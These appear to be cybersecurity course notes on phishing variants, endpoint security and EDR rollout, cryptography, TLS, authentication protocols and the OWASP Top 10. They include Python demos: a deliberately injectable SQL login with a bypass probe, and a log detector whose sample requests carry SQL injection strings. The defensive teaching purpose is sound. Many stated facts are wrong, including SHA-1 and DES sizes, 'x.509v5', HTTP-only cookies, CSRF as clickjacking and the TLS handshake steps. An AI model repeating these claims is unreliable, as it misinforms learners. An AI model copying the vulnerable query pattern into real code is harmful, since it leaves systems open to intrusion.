The attacker attaches a malicious file (a macro-enabled document, a script, an archive containing an executable) to the email and sends it to end users; once an end user downloads and opens the attachment, and there is a vulnerability or the macro is enabled, the end user's machine is compromised. In the SOC this is handled as a phishing email investigation plus a malware investigation.

Mitigations
1) Email gateway / email security solutions (with attachment sandboxing)
   a) O365 Defender
   b) Proofpoint
   c) Mimecast
   d) IronPort
2) Proxy or web gateway
3) EDR/XDR
4) NGFW
5) Security awareness through phishing email campaigns

55) Quishing
The attacker sends a malicious email containing a QR code, with text asking the end user to scan it (for example to "verify" an account or view a document). Because the link is embedded in an image, URL filters in the email gateway may not see it; once the end user scans the code with their phone, the malicious content is downloaded and the device or the user's account is compromised.

Mitigations
1) Email gateway / email security solutions (with QR code / image URL extraction)
   a) O365 Defender
   b) Proofpoint
   c) Mimecast
   d) IronPort
2) Proxy or web gateway
3) EDR/XDR
4) NGFW
5) Security awareness through phishing email campaigns

56) Snowshoeing (hit and run)
The attacker sends the phishing emails in small volumes spread across many malicious IPs and malicious domains, so that no single source crosses the reputation or rate threshold of the spam filters (the load is spread out like a snowshoe); in this way the attacker tricks the end user and finally gains unauthorised access or sensitive data exposure.

Example of the legitimate side to be allow-listed (business IPs and business domains, as listed in the notes):
outlook.tcs.com
1.1.1.1  example.tcs.com
1.1.1.2  test.tcs.com
1.1.1.3  welcome.tcs.com
1.1.1.4
1.1.1.5

Mitigations
1) Email gateway / email security solutions
   a) O365 Defender
   b) Proofpoint
   c) Mimecast
   d) IronPort
2) Proxy or web gateway
3) EDR/XDR
4) NGFW
5) Security awareness through phishing email campaigns
6) Gather the business IPs and business domain information from the network team or internal stakeholders, whitelist (allow-list) those IPs and domain names, and blacklist the malicious IPs and domains at the perimeter and also on the endpoint side (NGFW, proxy, EDR, XDR)

57) Deepfake - AI (artificial intelligence) based phishing
Using artificial intelligence, scammers or attackers swap faces and voices in audio and video, impersonate a real person (a relative, or an executive authorising a payment) and then blackmail or defraud the victim; if the victim is unable to pay, they threaten to publish the material. In this way the original user is impacted.

Mitigation
1) Security awareness; verify any unusual request through a second, known channel before acting on it
Project life cycle management (project delivery or service delivery)

1) Sales
2) Presales
3) Design / Architect (HLD, LLD) - Project Manager
4) Implementation
5) Operational support (L1, L2 and L3)

Consulting or service companies (they work on projects):
1) TCS
2) Infosys
3) CTS
4) Accenture
5) Capgemini
6) Tech Mahindra
7) HCL
8) Mindtree and LTI

Product development companies:
1) Google
2) Microsoft
3) Amazon
4) Honeywell
5) Robert Bosch
6) GE Healthcare
7) Philips
8) Schneider Electric
9) Nokia
10) Motorola

Example: HSBC Bank PLC requirement is implementation of endpoint security / EPP (to implement AV/EDR).
Take all the endpoints (LT, MAC, WS, DT, all servers and VMs): 100000.

Proposals received:
TCS (CrowdStrike AV) - 500k USD
Infosys (McAfee) - 450k USD
HCL (Trend Micro) - 475k USD
Tech Mahindra (Microsoft Defender) - 600k USD
Mindtree (SentinelOne) - 550k USD

Each vendor goes through the same stages:
Sales: requirement gathering
Presales: giving the presentation (company profile, tools with partnership, existing customer deployments) and POC (proof of concept) - 2 weeks
Tender or RFP (request for proposal): HSBC receives 10 proposals from TCS, Infosys, HCL, Tech Mahindra, Mindtree, Capgemini, Accenture, CTS, CGI, Deloitte
Design / Architect (HLD, SDD, LLD)
Implementation: LLD (blueprint)
L1, L2, L3: operational support (EDR / AV - malware)

Endpoint protection (EPP) or endpoint security

Endpoint: end user machine, host machine, or employee asset or machine.
Examples of endpoints (with counts in the example organization):
1) Laptop 1000
2) MacBook 500
3) Workstation 500
4) Desktop 500
5) Mobile 100
6) Servers 100

Protecting all the endpoints, assets or end user machines from hackers, intruders, threat actors or adversaries is called EPP or EPS.

Endpoint security solutions
1) AV/EDR/XDR
2) Endpoint DLP
3) Endpoint encryption (data at rest encryption)
4) FIM
5) HIDS/HIPS
6) MDM

In general the life cycle of every endpoint security solution is:
Licensing: based on the number of endpoints or IPs
Deployment: hardware based, software, or SaaS (cloud)
Implementation: agent and server (security tool)

The vendor-provided agent has to be deployed on each end user machine. When abnormal, malicious or suspicious activity is performed by an external attacker or an internal employee, the agent communicates with the security tool. Based on the policies configured and the detection method defined by the vendor (backend process), security incidents are triggered in the dashboard of the security tool. As endpoint security analysts we take care of security incident investigations and forensic analysis.

Severity of the alerts (severity - risk score)
Critical 80-100
High 60-80
Medium 40-60
Low 20-40
Info 0-20

Agent status
1) Active/Online
2) Inactive
3) Sleeping
4) Unknown

Note: in case the agent status or health check shows sleeping, unknown or inactive, we have to troubleshoot, fix or debug the problem.

How to troubleshoot?
1) Verify the compatibility of the OS versus the agent deployed
2) Wake up the agent
3) Verify the configuration
4) Analyze the logs
5) Uninstall and reinstall
6) Raise a support case with the vendor

Server side agent installation: download the agent from the security tool and, before installing in the PROD environment, test it in the development or testing environment and observe CPU, RAM and bandwidth utilization, performance related issues and also application compatibility.

Security profiles or policies: policies should be configured based on the endpoint security solution.

Security tool implementation approach (administration, implementation, configuration and security incident investigations, done virtually or remotely):
Assign the management IP or hostname to log into the tool
Default gateway
Subnet mask
Integrating with AD / LDAP (389/636)
Integrating with DNS servers (primary and secondary) - 53
Integrating with SMTP - 25
Asset group or device groups (based on OS)
Policies
Dashboards
Reports
Install all the agents on the endpoints
Integrating the logs to the SIEM tool

Installing larger deployments can be done using SCCM (System Center Configuration Manager) or WSUS (Windows Server Update Services).

1) AV/EDR/XDR (Anti Virus / Endpoint detection and response / Extended detection and response)

An AV/EDR/XDR solution monitors or detects, prevents, blocks and quarantines all malware categories of attacks.

Licensing: depends on how many endpoints or IPs are available (backend process).

Deployment: hardware, software, SaaS.

EDR/XDR/AV design
1) HLD (High level design)
2) LLD (Low level design)

HLD
1) Scope of the work (EDR implementation)
2) Risks
3) Assumptions
4) Design architecture diagram
5) Project implementation
6) Kick-off meeting
7) Training
8) Handover

LLD
1) Scope of the work
2) Risks
3) Assumptions
4) Design architecture diagram
5) Project implementation
6) Kick-off meeting
7) Training
8) Handover
9) Implementation approach:
Assign the management IP or hostname to log into the tool virtually or remotely
Default gateway
Subnet mask
Integrating with AD / LDAP (389/636)
Integrating with DNS servers (primary and secondary) - 53
Integrating with SMTP - 25
Asset group or device groups (based on OS)
Policies
Dashboards
Reports
Install all the agents on the endpoints
Integrating the logs to the SIEM tool

Implementation method name: agent and EDR tool, or agent and server based approach.

Agent status
Active
Inactive
Sleeping
Unknown

Agent troubleshooting
1) Verify the compatibility of the OS versus the agent deployed
2) Wake up the agent
3) Verify the configuration
4) Analyze the logs
5) Uninstall and reinstall
6) Raise a support case with the vendor

Download the agent from the security tool and, before installing in the PROD environment, test it in the development or testing environment and observe CPU, RAM and bandwidth utilization, performance related issues and also application/server compatibility.

Security profiles or policies (EDR/XDR)
1) Threat prevention (malware, HIDS/HIPS)
2) App control
3) Web control
4) Update management
5) DLP
6) FIM

Severity of the alerts (severity - risk score)
Critical 80-100
High 60-80
Medium 40-60
Low 20-40
Info 0-20

EDR actions for a security incident
1) Allow
2) Block
3) Quarantine
4) Alert

AV/EDR/XDR logs integration to SIEM tool
1) Syslog server method
2) API token method

Flow: end user or attacker -> EDR tool -> (syslog or API token method) -> SIEM tool -> alerts are triggered by the malware category correlation rules.

EDR/XDR vendors
1) CrowdStrike
2) Defender from Microsoft
3) Sophos
4) SentinelOne
5) Carbon Black
6) McAfee
7) Symantec
8) Trend Micro
9) Resolution One
10) Kaspersky
11) ESET
12) AVG
13) Malwarebytes
14) Avast

Policy types
Default
Customized policies

Default policies provided by the EDR/XDR vendor
1) Threat prevention (malware and HIDS/HIPS)
2) Web control
3) Application control
4) FIM
5) Basic DLP
6) Peripheral control
7) Update management
8) Windows firewall

Dashboards: default dashboards; customized

Reports: default; customized
Exceptions or exclusions
Whenever a business case arises, e.g. an end user is downloading or copying files and our EDR agent is blocking it, the business stakeholders raise a ticket with the endpoint security team stating that the EDR agent is blocking a file download. Whenever these scenarios arise, do the following:
1) Do the malware analysis of why the EDR agent is blocking (using open source tools, sandboxing and also the EDR tool)
2) In case of any confusion or query on the infection side, raise a case with the vendor and take advice from the vendor on analysing the malware and why the EDR agent is blocking
3) In case the vendor also says the file has an infection, take written email communication from the stakeholder and only then give the exception or exclusion in the EDR tool

Exclusions can be made using username, IP address, computer name, file hash, file path or file folder.

NOTE (RACI): as per the RACI matrix (Responsible, Accountable, Consulted and Informed), responsibility and accountability for such exceptions should not sit with the security analysts.

Threat hunting: hunting for threats proactively is called threat hunting.

Threat hunting types
1) Automated - based on conditions, Boolean algebra, policies, logic and algorithms
2) Manual - hypothesis, assumption, guessing, imagination, crown jewels, legacy or old systems, query based approach

Detection methods (used by EDR/XDR, DLP, HIDS/HIPS, FW, proxy, WAF, CSPM, VM, SIEM etc.)
1) Signature
2) ML/AI/Behavioural pattern/Historical analysis (heuristic approach)
3) Hash value method
4) Sandboxing method
5) Baseline method

1) Signature: signature based detection is applicable to known categories of attacks. The vendor maintains regular threat intelligence feed updates and updates the signatures on a daily basis. When an end user or attacker performs malicious activity, the tool checks the vendor signature database and, if the signature matches, it blocks the activity.

2) ML/AI/Behavioural pattern: used to identify new or unknown categories of attacks based on the behaviour of the entity, asset and user. Based on user activity or user action and entity activity or entity action, the tool learns the behaviour and triggers an alert notification if it is first-time activity.
Example: github.com - alert on day 1, alert on day 2, alert on day 3 ... by day 30 github.com is treated as legitimate.

3) Hash value method: applicable to true positives (the system got compromised and an alert was triggered). We have to do the analysis and finally block the hash value in the EDR tool so that in future it does not repeat.

4) Baseline method: after deploying the security tool, the tool learns actions, activity and traffic and forms a baseline. Whenever the baseline is crossed an alert is triggered automatically. As security analysts we have to analyse whether it is really a false positive or a true positive (legitimate or illegitimate).

5) Sandboxing method: we create a testing environment to test malware samples or analyse malware in our on-premise location. Here we validate the malware analysis using static analysis and dynamic analysis.

Security incident investigation life cycle management frameworks
Whenever we want to do a security incident investigation we follow two different frameworks:
1) ITIL process
2) NIST framework

ITIL
1) Preparation
2) Identification
3) Containment
4) Eradication
5) Recovery
6) Lessons learned or post-mortem report

NIST framework
1) Detect
2) Identify
3) Protect
4) Recover
5) Report

Difference between AV/EDR/XDR

Feature | AV | EDR | XDR
1) Endpoint based detection, investigation and response | Yes | Yes | Yes
2) Endpoint based malware, exploitation and attack prevention | Partially | Yes | Yes
3) Network based detection, investigation and response | No | No | Yes
4) User behavioural analytics, detection and response | No | Partially | Yes
5) Automated identification of network, endpoint and cloud data to improve and simplify investigations | No | Partially | Full fledged
6) Integrating with VT.COM, MITRE ATT&CK framework, google.com and other open source tools | No | Yes | Yes
7) Containment, network isolation, cleaning of the infection | No | Yes | Yes
8) Security orchestration and automated response (SOAR) | No | Partially | Yes
9) Threat hunting capability, querying | No | Partially | Yes
Application security
1) SDLC vs SSDLC (Software development life cycle vs Secure software development life cycle)
2) Cryptography (Symmetric and Asymmetric cryptography)
3) WAF
4) OWASP TOP 10 (2021)

1) SDLC vs SSDLC (Software development life cycle vs Secure software development life cycle)

Phase 1) Requirement
SDLC: requirement gathering, product backlog refinement (Aha and Atlassian)
SSDLC (Security): threat modelling (Microsoft STRIDE, PASTA, DREAD)
STRIDE: S - Spoofing, T - Tampering, R - Repudiation, I - Information disclosure, D - Denial of service, E - Elevation of privilege

Phase 2) Design
SDLC: software architects or design team design the SDD, HLD and LLD (Confluence, Jira, Aha, Atlassian)
SSDLC: the security team, after doing the threat modelling, has to analyse the risk assessment and business impact analysis. After threat identification the security team has to verify; the design team will accept the risk, mitigate the risk in the same release, or choose risk avoidance or risk transfer (tracked in Atlassian, manual Excel, Jira, SNOW)

Phase 3) Development (CI/CD)
SDLC: feature development (Postman, SonarQube, GitHub)
SSDLC: security scans
1. Code scan: SAST (Static application security testing) or SCA (Software composition analysis) - Fortify, Checkmarx, IBM AppScan, Veracode etc. Note: after analysing code issues, raise a case with the development team and ask internal stakeholders to fix
2. TPS scan (Third party software): WhiteSource, Black Duck, Snyk etc. Note: after analysing TPS issues, raise a case with the development team and ask internal stakeholders to fix

Phase 4) Testing
SDLC: testing of the feature or functional testing
SSDLC: VAPT (vulnerability assessment and penetration testing). Penetration testing types: manual and automated
Automated: DAST (Dynamic application security testing)
Manual pen test types:
Black box: with limited information (ex: URL link, IP address etc.) the security team has to identify vulnerabilities or threats
Grey box: providing partial information and identifying the threats is called grey box
White box: providing the full details and identifying vulnerabilities is called white box penetration testing
Note: after completing the pentest, the security team works with the development team, testers and the design team and asks internal stakeholders to fix

Phase 5) Operational or GA or release
Once the security team has signed off, if security issues still exist, senior management decides whether to release the feature

Agile/Scrum process roles
1) PO (Product Owner)
2) DM
3) SM

PO: owns the backlog and priorities. Example (Facebook) - feature, priority, target quarter:
1 to 1 - Audio call recorder - 1 - Q1 2025
1 to 1 - Video call recorder - 2 - Q2 2025
1 to many - Audio call recorder - 3 - Q3 2025
1 to many - Video call recorder - 4 - Q4 2025

DM: developing of the application (development team of 15)

SM: sprint planning (example sprint: November 3rd to November 12th)

Patch policy
Critical bugs: 10 working days
High vulnerabilities: 1 month
Medium, Low and Info: 3 months

Cryptography
Securing web communication using mathematical calculations and algorithms: we encrypt the data so that it is difficult for an attacker to decrypt or decipher it.

Examples of cryptography operations
1) Encryption
2) Decryption
For encrypting and decrypting the data we use two keys: 1) Private key (secret key) 2) Public key (sharable key)

Cryptography algorithm types
1) Symmetric cryptography
2) Asymmetric cryptography
3) Hybrid (PKI)

Symmetric cryptography: the same key is used for both encryption and decryption.
Ex: endpoint encryption (OS), disk encryption, DB encryption

Advantages: confidentiality or privacy, encryption, faster

Disadvantages of symmetric cryptography
1) It does not provide authenticity, integrity or non-repudiation
2) It uses more keys: for n parties, n(n-1)/2 keys
3) It needs more keys to be exchanged

Example algorithms
RC4
RC5
MARS
Twofish
Blowfish
DES - Data Encryption Standard 128 bit
AES - Advanced Encryption Standard 128 bit and 256 bit
3DES - Triple DES 256 bit

Asymmetric cryptography: two different keys are used for encryption and decryption.

Advantages: confidentiality, authenticity, authorization, non-repudiation, integrity

Disadvantages: 1) It is slower

Example algorithms (key sizes 512, 1024, 2048 and 4096)
DH - Diffie-Hellman
ECC - Elliptic curve cryptography
RSA - Rivest, Shamir and Adleman
DSA - Digital signature algorithm
Knapsack

Symmetric cryptography vs asymmetric cryptography
1) Same key used for both encryption and decryption | Two different keys used for encryption and decryption
2) Provides confidentiality | Provides confidentiality, authenticity, integrity, non-repudiation, authorization
3) Faster | Slower
4) Uses more keys | Uses fewer keys
5) For n parties the key count is n(n-1)/2 | For n parties the key count is 2n
Example algorithms: RC4, RC5, Twofish, Blowfish, MARS, AES, 3DES, DES | Example algorithms: RSA, DSA, DH, Knapsack, ECC

For choosing the correct ciphers (whether a cipher is weak or strong) we use the compliance standard FIPS 140-2 (Federal Information Processing Standard).

3) Hybrid cryptography: a combination of both symmetric and asymmetric cryptography.
Symmetric cryptography is used for data transfer.
Asymmetric cryptography keys are used for key exchange.

SSL/TLS mutual authentication or SSL/TLS handshake
(Client or end user (front end) holds a public key and a private key; the backend server holds a public key and a private key.)
1. The end user initiates the connection in the web browser (example www.hdfcbank.com)
2. The server sends its public key to the end user or client
3. Symmetric keys are used for the data transfer (whatever input the end user provides)
4. Using the public key shared by the server, the end user encrypts the data
5. Finally an encrypted channel forms between the client and the server
6. Using the server private key, the server decrypts the data and takes the appropriate action

Drawback: in the second step we are not sure whether the public key was shared by an attacker or by the legitimate server. If we want to eliminate this drawback (who is sending the key) we use digital certificates or SSL/TLS certificates.

Integrity: data manipulation; an unauthorised user or attacker should not add, delete, modify or update the data.

Data can be modified in two ways: knowingly or intentionally; unknowingly or unintentionally.

Integrity depends on
1) Hashing algorithm
2) HMAC
3) Digital certificates

1) Hashing: the digital representation of a file is called a hash. It is a combination of characters and numbers.
There are 3 different types of hashing algorithm (with digest size in bits)
1) MD5 - Message digest 128
2) SHA-1 140
3) SHA-256 256

Password hashing: passwords are stored in the backend database in the form of a hash value.
Hash value: in the form of characters and numbers.
Salt value: a unique or unknown number generated when the end user authenticates against the backend DB server.
Example: password Password@123 with salt abcd1234; password Password@!23 with salt bcde4567.

2) HMAC (Hash message authentication code): to maintain integrity or data security we use HMAC. Example: an unauthorised attacker or end user changing the body content of a file.
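The salted password storage and the HMAC integrity check described above, as an added example using only the Python standard library (this is not code from the notes; the PBKDF2 iteration count, the shared secret and the message body are constructed for the example):

```python
# Added example (not from the notes): salted password hashing and an HMAC
# integrity tag, using only the Python standard library.
import hashlib
import hmac
import os
from typing import Optional, Tuple

# Assumed parameter for this example, not taken from the notes.
PBKDF2_ITERATIONS = 200_000


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Return (salt, digest) to store in the backend DB instead of the plaintext.

    A fresh random salt per user means two users who both chose Password@123
    still get different stored hashes, so one cracked hash reveals nothing
    about the other.
    """
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return salt, digest


def verify_password(password: str, salt: bytes, stored_digest: bytes) -> bool:
    """Re-derive the digest with the stored salt and compare in constant time."""
    _, candidate = hash_password(password, salt)
    # compare_digest does not stop at the first differing byte, so timing
    # does not leak how much of the digest matched.
    return hmac.compare_digest(candidate, stored_digest)


def hmac_tag(key: bytes, body: bytes) -> str:
    """Integrity tag over a message or file body.

    Unlike a plain hash, the tag cannot be recomputed by someone who changes
    the body but does not hold the key.
    """
    return hmac.new(key, body, hashlib.sha256).hexdigest()


def verify_body(key: bytes, body: bytes, tag: str) -> bool:
    return hmac.compare_digest(hmac_tag(key, body), tag)


def demo() -> Tuple[bool, bool, bool, bool]:
    """Walk through both checks; returns (login ok, wrong pw, body ok, tampered body)."""
    salt, digest = hash_password("Password@123")          # stored at registration
    login_ok = verify_password("Password@123", salt, digest)
    login_wrong = verify_password("Password@!23", salt, digest)

    key = b"constructed-shared-secret"                     # constructed for the example
    body = b"amount=100&to=savings"                        # constructed message body
    tag = hmac_tag(key, body)
    body_ok = verify_body(key, body, tag)
    tampered = verify_body(key, b"amount=900&to=savings", tag)  # body changed, tag kept
    return login_ok, login_wrong, body_ok, tampered


if __name__ == "__main__":
    print(demo())  # (True, False, True, False)
```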

3) Digital certificates: the digital signature represents the integrity of the end user and also the authenticity of the end user.
The current version of the digital signature algorithm we use in SSL/TLS certificates is x.509v5.
Digital signatures depend on SSL/TLS certificates to maintain integrity.

SSL/TLS certificates
Types of applications
1) Internal applications - should be accessed via VPN (example count: 200)
2) Internet facing - anyone can access from anywhere without VPN

There are two different types of SSL/TLS certificates
1) Self signed
2) Purchased CA (Certificate authority)

Self signed certificate: if the certificate is generated on the server where the application is hosted, or in the tool, this type of certificate is called self signed.
Fields:
CN: Common name (domain name)
Address of the application deployment on top of the server
Tenure
For internal applications we use self signed certificates. Self signed certificates are free of cost.

2) Purchased CA certificate: these SSL/TLS certificates have to be purchased from a third party vendor.
ex: GoDaddy, DigiCert, GTS, RHEL IdM, Verisign
Example: Google.com certificate 200 USD, covering gmail.com, youtube.com, google calendar, googledocs.com, google meeting, google maps
How can we upgrade a WAF? Example of upgrading Akamai WAF from 8.0 to 9.0 (Change GA)
1) Break the connection between primary and secondary
2) Upgrade the secondary WAF to the newer version
3) Upgrade the primary WAF to the newer version (1 or 2 days)
4) Sync up the configuration
5) Test the high availability
6) Create the policies (OWASP TOP 10)
7) Onboard one application, then the second and third
8) Testing
9) After completing the WAF implementation, security alerts or alarms trigger in the dashboard or by email notification
10) L1, L2 and L3 teams do incident investigations against the OWASP TOP 10 alerts

OWASP TOP 10: OWASP is an institution or organization that conducts surveys or collects feedback on application layer or layer 7 attacks and finally publishes the top 10 categories of attacks.

Input validation: validating the request wherever the end user provides input.

Application 3 tier architecture
1) User layer (input validation)
2) Business or logical layer (development side)
3) Backend layer (DB)

HTTP response codes
1xx Informational response
2xx Status is OK / successful
3xx Redirection
4xx Client side error or issues
5xx Server side error

Endpoint authentication
SAML - server side (AD/DC)
NTLM - server side (AD/DC)
Kerberos - mutual (client and server), port 88

Network authentication
RADIUS
TACACS+

Cloud: AD (IAM/PAM) (on-premise AD / cloud)

Application authentication
SAML
OpenID Connect
OAuth 2.0

SAML vs OAuth 2.0 vs OpenID Connect
1) SAML: open standard for authentication and authorization | OAuth 2.0: open standard used for authorization | OpenID Connect: open standard used for authentication
2) SAML: developed by OASIS in 2001 | OAuth 2.0: developed by Twitter and Google in 2006 | OpenID Connect: developed by the OpenID organization in 2014
3) SAML: SSO (single sign-on) at enterprise level, ex: OKTA | OAuth 2.0: API authorization | OpenID Connect: SSO for consumer apps
4) SAML: XML | OAuth 2.0: JSON | OpenID Connect: JSON

Current authentication mechanism on the application side: OAuth 2.0 with OpenID Connect (token based authentication mechanism)
Ex: Microsoft
Ping Identity
ForgeRock
ZTNA (Zero trust network access) tools

Content security policy: defines which payload, domain or content we allow or block.

Cookies: HTTP only - clear text or plain text; HTTPS only - encrypted text

JWT token: JSON token based

Anti token (honeypot): a preventive mechanism implemented by organizations to mislead or misguide attackers; we use it as a defensive or preventive control.

CWE (Common weakness enumeration): unique for each application category of attack defined by OWASP TOP 10.

OWASP TOP 10 survey years: initially conducted in 2010, then 2013, 2017, 2021, 2025 (quarter 1)

As per OWASP TOP 10 2021 the attacks are
A01: Broken access control
A02: Cryptographic failures
A03: Injection (injection and cross site scripting attack)
A04: Insecure design (design / threat modelling)
A05: Security misconfiguration
A06: Vulnerable and outdated components (TPS)
A07: Identification and authentication failures
A08: Software and data integrity failures
A09: Insufficient logging and monitoring (SIEM)
A10: SSRF
Additional items kept in these notes:
A11: MITM
A12: Buffer overflow attack
A13: CSRF or click jacking or one click

1) Broken access control: an attacker or internal employee can break the access provided and misuse it.
Mitigation: based on the internal employee roles and responsibilities and SoD (segregation of duties), implement RBAC; from the external attacker point of view, implement strong or complex password policies.

2) Cryptographic failures: this attack occurs when we use weak ciphers on the server where the application is hosted (example: CSR file download) and also on the SSL/TLS certificate side (legacy ciphers or legacy encryption).
Mitigation: use strong ciphers as per symmetric and asymmetric technologies and based on FIPS 140-2 compliance.

4) Insecure design: at the design level of the SDLC life cycle, many companies do not implement threat modelling using the different frameworks.
Mitigation: implement threat modelling with the software architects or product owners using Microsoft STRIDE analysis.

5) Security misconfiguration: this flaw or bug occurs when the application or WAF team does not have sufficient skills, or makes typing errors, mistakes or security misconfigurations.
Mitigation: re-verify the configuration when implementing security controls for WAF, SAST, DAST or any other tools; provide training to the application security team so that the mistakes are not repeated.

6) Vulnerable and outdated components: this issue occurs in the development phase of the CI/CD pipeline, if we use any legacy, older, outdated, EOL or EOS software for application development.
Mitigation: use the latest software or TPS version as provided by the vendor; educate developers on the implications, causes or impact of using legacy versions for application development.

7) Identification and authentication failures: guessing the username and password and succeeding with user credentials falls under authentication failure.
Mitigation
1) Strong, complex password
2) MFA
3) Default passwords should not be used

8) Software and data integrity failures: occurs if we do not provide RBAC or SoD for the internal employees as part of application development.
Mitigation: implement RBAC for repositories; implement segregation of duties.

9) Insufficient logging and monitoring: all the applications are not integrated to SIEM and are not monitored 24*7*365 for security incident investigation of the OWASP TOP 10 categories of attacks.
Mitigation: implement logging, integrate to the SIEM tool and monitor OWASP TOP 10 attacks.

A3) Injection flaw attack (injection and cross site scripting attack)

Injection flaw attack: the attacker or end user inserts untrusted input or commands wherever input validation is required and tries to execute those commands to verify whether the application is vulnerable; finally the attacker compromises the backend server and gains unauthorised access to it.

What to inject
1) SQL queries
2) PHP
3) HTML
4) JavaScript
5) LDAP
6) OS commands

Where to inject: wherever input validation is required. For example: username, password, like, share, comment, feedback (backend server side attack).

Why to inject: to see whether the application is vulnerable or not.

Mitigation
1) Input validation (SAST scans, DAST, manual pentest)
2) WAF

SQL injection attack: the attacker or end user inserts untrusted SQL queries where input validation is provided and checks whether the application is vulnerable or not. If the web application is vulnerable, he tries to execute those SQL queries and in this way compromises the backend server.
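The injection flaw and its two code-level mitigations from this section (input validation and parameterized queries), as an added example that is not from the notes: a login lookup that concatenates user input into SQL beside the parameterized version, run against an in-memory SQLite table whose rows, hash values and the probe string are all constructed here.

```python
# Added example (not from the notes): the same lookup written the vulnerable
# way and the parameterized way, against a constructed in-memory database.
import re
import sqlite3
from typing import List, Tuple

USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")  # allow-list for the username field


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    # Constructed sample rows; the hash values are placeholders, not real digests.
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "hash-of-alice"), ("bob", "hash-of-bob")],
    )
    return conn


def valid_username(username: str) -> bool:
    """Input validation: reject anything outside the allow-list before it reaches SQL."""
    return USERNAME_RE.fullmatch(username) is not None


def find_user_vulnerable(conn: sqlite3.Connection, username: str, password_hash: str) -> List[str]:
    # The input is pasted into the query text, so a quote in the input changes
    # the structure of the statement instead of being treated as data.
    query = (
        f"SELECT username FROM users WHERE username = '{username}' "
        f"AND password_hash = '{password_hash}'"
    )
    return [row[0] for row in conn.execute(query)]


def find_user_safe(conn: sqlite3.Connection, username: str, password_hash: str) -> List[str]:
    # Placeholders: SQLite receives the values separately from the SQL text,
    # so a quote in the input is just a character inside the string value.
    query = "SELECT username FROM users WHERE username = ? AND password_hash = ?"
    return [row[0] for row in conn.execute(query, (username, password_hash))]


def run_demo() -> Tuple[List[str], List[str], List[str], bool, bool]:
    """Show the difference on one probe string (constructed: a quote followed by
    an SQL comment marker, the textbook shape of a login bypass)."""
    conn = make_db()
    probe = "alice' --"
    return (
        find_user_vulnerable(conn, probe, "wrong-hash"),  # comment hides the password check
        find_user_safe(conn, probe, "wrong-hash"),        # no such username: empty result
        find_user_safe(conn, "alice", "hash-of-alice"),   # legitimate login still works
        valid_username(probe),                            # rejected by input validation
        valid_username("alice"),
    )


if __name__ == "__main__":
    print(run_demo())  # (['alice'], [], ['alice'], False, True)
```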

SQL injection attack monitoring via SIEM tool
Data sources or log sources and their log integration method:
1) DB server - syslog or collector agent
2) Web server - syslog or collector agent
3) WAF - syslog (on-premise), API token method (SaaS)
4) Application - API token or syslog
Log collector: aggregation, parsing, normalization
Log processor or ESM: indexing, querying, filtering, CRE (Correlation rule engine)
SIEM console or user console: alert is triggered as per OWASP TOP 10; SOC takes care of the incident investigations
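The collector and CRE stages above, as an added example that is not from the notes: a few constructed web server access log lines are parsed, the request path is normalized (URL-decoded), injection-shaped requests are flagged, and a correlation rule raises one alert when a single source IP produces a threshold of such requests inside a time window. The log lines, field names, patterns, threshold and window are all constructed for the example.

```python
# Added example (not from the notes): parse -> normalize -> match -> correlate,
# the pipeline a SIEM runs over web server / WAF events, on constructed input.
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote

# Constructed access log lines (combined log format). 10.0.0.9 sends three
# injection-shaped requests within a few seconds; the others are benign.
SAMPLE_LOGS = """\
10.0.0.5 - - [03/Nov/2025:10:00:01 +0000] "GET /login?user=alice HTTP/1.1" 200 512
10.0.0.9 - - [03/Nov/2025:10:00:02 +0000] "GET /login?user=alice%27%20OR%20%271%27%3D%271 HTTP/1.1" 500 128
10.0.0.9 - - [03/Nov/2025:10:00:03 +0000] "GET /search?q=1%20UNION%20SELECT%20password_hash%20FROM%20users HTTP/1.1" 500 128
10.0.0.9 - - [03/Nov/2025:10:00:04 +0000] "GET /item?id=1%27-- HTTP/1.1" 500 128
10.0.0.7 - - [03/Nov/2025:10:00:05 +0000] "GET /search?q=select%20a%20phone HTTP/1.1" 200 2048
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \d+'
)

# Signature-style patterns (the "signature" detection method from the notes).
SUSPICIOUS = [
    re.compile(r"'\s*(or|and)\s", re.I),   # quote followed by a boolean operator
    re.compile(r"\bunion\s+select\b", re.I),  # union-based data extraction shape
    re.compile(r"'\s*--"),                   # quote followed by an SQL comment marker
]


def parse_line(line: str) -> Optional[Dict]:
    """Parsing + normalization: split one raw line into fields, decode the path."""
    m = LINE_RE.match(line)
    if not m:
        return None  # unparseable line: drop it rather than crash the pipeline
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m["ip"], "ts": ts, "path": unquote(m["path"]), "status": int(m["status"])}


def is_suspicious(path: str) -> bool:
    return any(p.search(path) for p in SUSPICIOUS)


def correlate(lines: List[str], threshold: int = 3, window_s: int = 60) -> List[Tuple[str, int]]:
    """Correlation rule: alert per source IP with >= threshold suspicious requests
    inside window_s seconds. Returns [(ip, total suspicious count), ...]."""
    hits = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev and is_suspicious(ev["path"]):
            hits[ev["ip"]].append(ev["ts"])

    alerts = []
    for ip, times in hits.items():
        times.sort()
        # sliding window over the sorted timestamps; one alert per IP
        for i in range(len(times) - threshold + 1):
            if (times[i + threshold - 1] - times[i]).total_seconds() <= window_s:
                alerts.append((ip, len(times)))
                break
    return alerts


if __name__ == "__main__":
    print(correlate(SAMPLE_LOGS.splitlines()))  # [('10.0.0.9', 3)]
```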

B) Cross site scripting attack (CSS or XSS)
The attacker injects malicious data scripts into the web application and checks whether they are executable. In case they are executable, the attacker gains unauthorised access. Cross site scripting applies to both the client and the server side.

Types of cross site scripting attack
1) Stored cross site scripting - server
2) Reflected - client (alert "Reflected XSS")
3) DOM (Document object model) - client (existing cookies)

Mitigation
1) Input validation
2) WAF (CSS or XSS)
3) Parameterized queries
4) CSP (Content security policy): identify the domains and business IPs and whitelist or block-list them where possible

10) CSRF (Cross site request forgery or XSRF), also called client side request forgery, one click or click jacking
